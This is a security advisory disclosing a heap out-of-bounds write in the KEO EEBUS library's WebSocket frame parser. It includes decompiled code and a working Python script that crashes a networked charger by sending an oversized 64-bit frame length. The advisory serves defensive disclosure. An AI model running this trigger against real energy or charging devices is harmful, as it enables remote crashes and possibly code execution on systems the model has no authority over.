Critical vulnerability in KEO EEBUS library

Product description

The KEO EEBUS library is a robust communication framework designed to facilitate interoperability and seamless data exchange within smart energy management systems. Developed by KEO Connectivity, the library aligns with the EEBUS initiative standards, which promote device compatibility and energy efficiency in smart home and industrial settings.

This library enables secure and efficient communication between a wide array of devices, such as smart meters, electric vehicle chargers, home energy management systems, and other IoT-enabled appliances. Leveraging standardized protocols, it allows devices to interact with and respond to energy demand, optimizing consumption and supporting energy grid stability. The KEO EEBUS library is widely integrated into systems focused on energy efficiency, smart grid technology, and sustainable energy management, serving both domestic and commercial applications.

SUMMARY

PCAutomotive team identified vulnerability that allowed an attacker to obtain code execution on systems using version 19.0.1 of the KEO library.

DISCLOSURE TIMELINE

TECHNICAL DETAILS

The PCAutomotive team verified all the findings described in this document on the model(s) KEO Library with version 19.0.1. This library is used for processing low level internals of EEBUS protocol.

Heap Out-Of-Bound Write in EEBUS

Description

EEBUS request consists of following levels:

1. TLS with self-signed certificates
2. WebSocket communication in binary mode
3. SHIP messages in JSON format

For using binary mode of WebSocket there is WebSocket framing, consists of masking, fragmentation etc. This functionality implemented in library libkeo_ship.so.19.0.1.

So in function keo_ship::WebSocketParser::parseFrame it tries to parse the following structure:

In case of second byte of frame ("payload len") is 0x7f, then payload length will be 64-bit value. It is parsed in function sub_24108 and saved to variable dPayloadLen:

if ( (unsigned int)(sData.pEnd - sData.pStart) <= 1 )  
	return 1;  
v7 = \*(\_BYTE \*)sData.pStart;  
v8 = \*((char \*)sData.pStart + 1);  
v9 = \*((\_BYTE \*)sData.pStart + 1) & 0x7F;  
if ( v9 > 0x7D )  {  
  if ( v9 == 0x7E )  {  
    if ( dDataLen <= 4 )  
    	return 1;  
    v10 = 4;  
    v9 = (unsigned \__int16)\__rev16(\*((unsigned \__int16 \*)sData.pStart + 1));  
   }  
  else  {  
    if ( dDataLen <= 0xA )  
    	return 1;  
    v10 = 10;  
    dPayloadLen = sub_24108(i_pInData, 2);  
   }  
 }  

Further this value checked:

pEnd = i_pInData->pEnd;  
pStart = (char \*)i_pInData->pStart;  
if ( dPayloadLen + dCurOffset <= pEnd - (\_BYTE \*)i_pInData->pStart )  
{  
	switch ( v7 & 0xF )  

Because of integer overflow this check can be bypassed. Further this value used in write operation for heap memory:

v20 = &pStart\[v18 - v17\];  
  if ( v20 != v18 )  
  	i_pInData->pEnd = v20;  
  if ( v8 < 0 && dPayloadLen )  
  {  
  	for ( i = 0; i != dPayloadLen; ++i )  
 		\*((\_BYTE \*)i_pInData->pStart + i) ^= v12\[i & 3\];  
  }  
  \*a3 = dPayloadLen;  

Because of value dPayloadLen is attacker controllable and can be greater than allocation size, as a result Out-Of-Bound Write vulnerability exist.

Exploitation scenario and impact

To reproduce this vulnerability charger should be accessible over network (Ethernet or wireless). The following script can be used to trigger the crash of the service:

import socket  
import ssl  

def main():  
  HOST = "192.168.178.47"  
  PORT = 4711  
  # HOST = "localhost"  
  # PORT = 11111  
  client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  
  client = ssl.wrap_socket(client, keyfile="key.pem", certfile="cert.pem")  
  client.connect((HOST, PORT))  
  client.send(b"GET / HTTP/1.1\\r\
sec-websocket-protocol: ship\\r\
Host: 192.168.178.47:4711\\r\
Connection: Upgrade\\r\
Upgrade: websocket\\r\
Sec-WebSocket-Version: 13\\r\
Sec-WebSocket-Key: 7hBeCrki4fXpmkTiNV/lgQ==\\r\
\\r\
")  
  print(client.recv(0x1000))  
  client.send(b"\\xfa\\xff" + b"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff" + 0x100 \* b'A')  
  print(client.recv(0x1000))  
  
if \__name__ == "\__main_\_":  
  main()  

The crash can be observed in the debugger:

This vulnerability triggered remotely. In case of successful exploitation attacker can achieve remote code execution on system.

SUPPLY CHAIN IMPACT

Based on information from open sources, several smart home providers, e-mobility companies, and charging solution vendors were relying on the affected library. This vulnerability might have impacted the supply chain of these companies. The PCAutomotive team advised prioritizing the patch implementation to effectively address and mitigate associated risks.

Recommendations

Considering the criticality of the vulnerability, immediate action was essential to safeguard the affected supply chain. The following steps were recommended:

• Notification of vendors using the affected library, encouraging prompt application of the patch.
• Review of supply chain dependencies by assessing any additional component or service that may be affected by this vulnerability.
• Monitoring for threat indicators by PSOC: advising the organizations to watch for potential signs of compromise related to the exploitation of the vulnerability.